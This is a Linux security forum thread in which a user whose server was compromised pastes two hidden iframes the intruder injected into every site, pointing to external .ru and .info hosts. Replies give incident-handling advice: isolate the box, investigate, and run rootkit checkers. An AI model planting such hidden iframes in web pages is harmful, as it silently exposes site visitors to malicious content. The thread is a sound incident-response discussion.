LinuxQuestions.org
Latest LQ Deal: Latest LQ Deals
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 04-04-2007, 04:06 AM   #1
oknow
LQ Newbie
 
Registered: Apr 2007
Posts: 2

Rep: Reputation: 0
Exclamation Server Hacked..pls help


i have got an email from cpanel saying mysql and mailman has uid0 account which should be compromised. and the guy hacked my server also put iframes on each of my sites.
here's the code:
Code:
<IFRAME name="StatPage" src="http://stelaartois.ru/index2.php" width=5 height=5 style="display:none"></IFRAME>

<iframe name="counter" src="http://mystabcounter.info/index2.php" height="16" width="16" frameborder="0" scrolling="no"></iframe>
now anybody know how to get rid of these code by perl?
i just know the following code to remove the strings:
Code:
find . -type f -name '*' | xargs perl -pi -e 's/old string/new string/g'
But it seems useless to get rid of the long codes such as iframes listed above.

Thanks for ur idea,pls help out!
 
Old 04-04-2007, 05:31 AM   #2
phantom_cyph
Senior Member
 
Registered: Feb 2007
Location: The Tropics
Distribution: Slackware & Derivatives
Posts: 2,472
Blog Entries: 1

Rep: Reputation: 128Reputation: 128
I think the term would be 'cracked'. Try this post here. Don't be afraid of the name, they are very helpful.
 
Old 04-04-2007, 06:51 AM   #3
Hangdog42
LQ Veteran
 
Registered: Feb 2003
Location: Maryland
Distribution: Slackware
Posts: 7,803
Blog Entries: 1

Rep: Reputation: 422Reputation: 422Reputation: 422Reputation: 422Reputation: 422
Personally, I think you need to unplug the machine from the network and start digging into how your machine was compromised. The CERT Intruder Checklist is a good place to start. You probably also want to check into running rkhunter and chkrootkit.
Quote:
now anybody know how to get rid of these code by perl?
Just getting rid of the code is not the problem here. If you've been compromised, you've got much bigger problems than just some extraneous iframes in your site. You need to find out how they got in and remedy the situation. Also posting details like distro, the level of control you have (is it your machine or someone elses) would be helpful. Also details around any security measures you had in place.
 
Old 04-04-2007, 04:04 PM   #4
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600Reputation: 3600
Quote:
Originally Posted by kalabanta
Try this post here.
(OT, but since I'm a moderator I'm allowed to do so Members who frequent LQSEC have done incident handling for the past years in a dedicated, decisive and successful way. If members don't react within say twentyfour hours then, and only if you aren't capable of doing incident handling yourself, you've got a case for redirecting off-site. In all other cases I'd rather you didn't.


@oknow: Hangdog42 is on the right track: 1) mitigate the situation by isolating the box (stop services and restrict access to your IP or range if it is a colo box), 2) investigate (take snapshots of users, running processes, network connections and open files before killing anything) and please try to be as verbose as you can when reporting.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Server has been hacked, help please Seventh Linux - Security 11 09-26-2006 11:57 AM
Why is my server getting hacked so much? dsschanze Linux - Security 17 07-27-2006 01:16 PM
Hacked - pls help matthewchin Linux - Security 8 04-18-2006 11:18 PM
server hacked!?!?! vittibaby Linux - Security 1 03-27-2004 12:31 PM
pls pls pls help me ! i'm tired with httpd config on fedora apache 2.0.48 AngelOfTheDamn Fedora 0 01-24-2004 05:12 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 07:44 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration